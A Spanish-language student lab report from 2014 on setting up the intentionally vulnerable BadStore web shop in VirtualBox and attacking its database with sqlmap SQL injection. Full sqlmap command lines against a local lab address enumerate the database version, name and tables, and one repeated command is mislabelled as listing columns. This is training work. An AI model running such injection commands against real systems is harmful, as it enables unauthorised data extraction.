Practica 1. Seguridad en Base de Datos

15
SEGURIDAD EN BASE DE DATOS PRACTICA 1 Realizada por Doris E. Jojoa Paz Escuela de Ciencias Básicas, Tecnología e Ingeniería “ECBTI”, Universidad Nacional Abierta y a Distancia “UNAD” 2014

Transcript of Practica 1. Seguridad en Base de Datos

SEGURIDAD EN BASE DE DATOSPRACTICA 1

Realizada porDoris E. Jojoa Paz

Escuela de Ciencias Básicas, Tecnología e Ingeniería “ECBTI”, Universidad Nacional Abierta y a Distancia “UNAD”

2014

Instalación de la máquina virtual Virtual box.

Descarga BadStore.

Descarga de SQLMA (http://sqlmap.org/) programa para realizar ataque por inyección de código SQL

Ataque a la base de datos de Badstore, obteniendo información sobre la base de datos(servidor de BD y versión, nombre de la base de datos, nombre de las tablas, etc.

Instalación de la máquina virtual Virtual box

Oracle VM VirtualBox

es un software de virtualización para arquitecturas x86/amd64, que permite  instalar sistemas operativos adicionales, conocidos como «sistemas invitados», dentro de otro sistema operativo «anfitrión», cada uno con su propio ambiente virtual.

Después de descargarlo de http://www.oracle.com/. Se procede a su instalación la cual es muy sencilla. A continuación se indican las pantallas más relevantes de su instalación.

1 23

45

6

Instalación de virtual vox 4.3.1.6

Una vez instalado virtualbox , también se ejecuta un paquete de extensión de virtualbox para complementar su funcionabilidad

DESCARGA LA BASE DE DATOS DE BADSTORE Y CONFIGURACIÓN.

Posteriormente, instalado virtualbox, se procede a su configuración y carga de la base de datos de Badstore que se descargó previamente de www.badstore.net ( se debe dar clic en el apartado que dice descargar demo para acceder a ella). Las siguientes pantallas indican la secuencia realizada para tal efecto.

12 3

4

DESCARGA DE BADSTORE.

56

7

89

10

Una vez termina la carga y configuración de Badstore, se procede a iniciar la máquina virtual, mediante el comando ifconfig, se logra visualizar Ip de la base de datos registrada 192.168.0.118 , esta dirección se ubica en el navegador para acceder a Badstore.

ATAQUE POR INYECCIÓN DE CÓDIGO SQL UTILIZANDO SQLMAP

SQLMAP se obtiene de http://sqlmap.org/ , pero para su ejecución requiere de la instalación de Python. Las carpetas que contienen los archivos de SQLMAP como de Python debe estar en la misma unidad para que funcionen adecuadamente.

ATAQUE A LA BASE DE DATOS DE BADSTORE

Para obtener información sobre la base de datos de Badstore, ingresamos a CMD, donde se listan sus directorios y a partir de sqlmap.py se ingresan las líneas correspondientes para ver información de la base de datos, como versión, tablas entre otras.

Las siguientes pantallas muestran información de la base datos.

Mediante la siguiente línea :

sqlmap.py -u "http://192.168.0.118/c

gi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" –b

se observa: Conexión a la base de

datos y la versión

Mediante la línea: sqlmap.py -u

"http://192.168.0.118/cgi-bin/badstore.

cgi?searchquery=hi&action=search&x=0&y=

0" --current-dbSe observa el

nombre de la base de datos

Mediante la línea: sqlmap.py -u

"http://192.168.0.118/cgi-bin/badstore.

cgi?searchquery=hi&action=search&x=0&y=

0" --tables -D badstoredb

Se observan las tablas de la base de

datos

Mediante la línea: sqlmap.py -u

"http://192.168.0.118/cgi-bin/badstore.

cgi?searchquery=hi&action=search&x=0&y=

0" --tables -D badstoredb

Se observan las columnas de la base

de datos. Y asi con diferentes

parametros se pueden extraer

datos del contenido de las tablas entre

otros.

ReferenciasTutorial - Manual SQLmap: ataques SQLi - Inyección SQL. Recuperado el 27 de septiembre de 2014 de: http://blog.elhacker.net/2014/06/sqlmap-automatizando-ataques-sqli-injection.html

http://www.oracle.com/technetwork/es/server-storage/virtualbox/downloads/index.html#vbox

http://sqlmap.org/

Descargar y usar SQLmap en Windows (Anonymous Cooperación Ciberactivista Global).(2/09/2012). Recuperado el 27 de septiembre de 2014 de: http://www.youtube.com/watch?feature=player_embedded&v=_wwYuilkn8M